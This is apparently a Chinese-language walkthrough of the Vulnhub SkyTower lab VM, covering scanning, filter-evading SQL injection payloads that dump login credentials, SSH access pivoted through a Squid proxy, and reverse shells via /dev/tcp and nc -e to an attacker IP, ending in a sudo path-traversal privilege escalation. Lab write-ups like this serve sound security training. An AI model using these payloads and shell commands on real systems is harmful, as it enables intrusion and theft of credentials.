Vulnhub-SkyTower

靶机实验Vulnhub

靶机下载链接

0x01 信息收集

nmap扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
nmap -p22,80,3128 -sC -sV -O 192.168.56.3

Nmap scan report for 192.168.56.3
Host is up (0.00083s latency).

PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.12 seconds

目录扫描

1
2
3
4
5
6
7
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/background (Status: 200)
/cgi-bin/ (Status: 403)
/index (Status: 200)
/login.php (Status: 200)
/server-status (Status: 403)

nikto扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
nikto -h http://192.168.56.3
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.3
+ Target Hostname:    192.168.56.3
+ Target Port:        80
+ Start Time:         2020-07-12 12:44:05 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 19:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.php: Admin login page/section found.
+ 8346 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2020-07-12 12:44:36 (GMT8) (31 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

0x02 漏洞利用

SQL注入

经过探索,我发现首页的登录页面存在sql注入,并且去空了or,不仅如此,它还过滤了select 和逗号,等号,and。人都傻了

sql-post
1
2
3
4
5
6
7
8
9
10
11
12
13
email=' oorrder by 3 # &password=1

email=' union ALL sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect 2)b JOIN (sselectelect 3)c) # &password=1

email=' union ALL sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect version())b JOIN (sselectelect 3)c) # &password=1

email=' union ALL sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect database())b JOIN (sselectelect 3)c) # &password=1

email=' union sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect group_concat(table_name) from infoorrmation_schema.tables where table_schema like 'SkyTech' )b JOIN (sselectelect 3)c) # &password=1

email=' union sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect group_concat(column_name) from infoorrmation_schema.columns where table_schema like 'SkyTech' aandnd table_name like 'login')b JOIN (sselectelect 3)c) # &password=1

email=' union sselectelect * FROM ((sselectelect 1)a JOIN (sselectelect group_concat(email) from login)b JOIN (sselectelect group_concat(passwoorrd) from login)c) # &password=1

成功爆破数据库后,会发现出来的页面是一个提示登录到ssh。已经给出了密码。通过sql注入点读取了/etc/passwd,确认了的确是有这三个用户的存在。接下来就要考虑该如何连进去了,因为22端口有防火墙的保护。

使用proxychains连接目标机器的squid http proxy代理。

设置代理

1
2
3
4
5
6
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4         127.0.0.1 9050
http 192.168.56.3 3128

之后就proxychains ssh [email protected]。但是会立刻闪退,谷歌之后猜测应该是目标机器设置了UsePAM yes的。三个用户我都尝试去登录了,只有william这个用户登录失败。同样的sara和john只要一连接上去就会退出。

这样的话,尝试直接ssh登录之后就运行命令如何?

弹shell

一开始尝试 bash反弹shell

1
proxychains ssh [email protected] "bash -c 'bash -i >& /dev/tcp/192.168.56.254/1234 0>&1'"

但是很遗憾不行,一运行这个命令,虽然是接受到了监听,但是两边都退出了。虽然反弹失败了,但是我们是不是可以考虑正向弹shell呢?

果然成功的收到了shell。

尝试其他反弹shell的命令

1
2
3
4
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.56.254 LPORT=1234
0<&177-;exec 177<>/dev/tcp/192.168.56.254/1234;sh <&177 >&177 2>&177

p4 ssh [email protected] "0<&177-;exec 177<>/dev/tcp/192.168.56.254/1234;sh <&177 >&177 2>&177"

这个命令也成功了。

nc反弹也可以

1
p4 ssh [email protected] "nc 192.168.56.254 1234 -e /bin/sh"

0x03 提权

拿到反弹shell后,我使用john用户进行了信息枚举,但是没发现什么特别的东西。随后我切换到了sara。发现这个用户能够执行sudo命令。

能够使用/bin/cat 查看/accounts下的任意文件。那么我们就可以

1
sudo cat /accounts/../root/flag.txt

0x04 总结

多尝试姿势。。bash -c 'bash -i ...'不是万能的。

参考

-SQLi-——-逗号,空格,字段名过滤突破
-ssh登录时出现闪退问题解决方法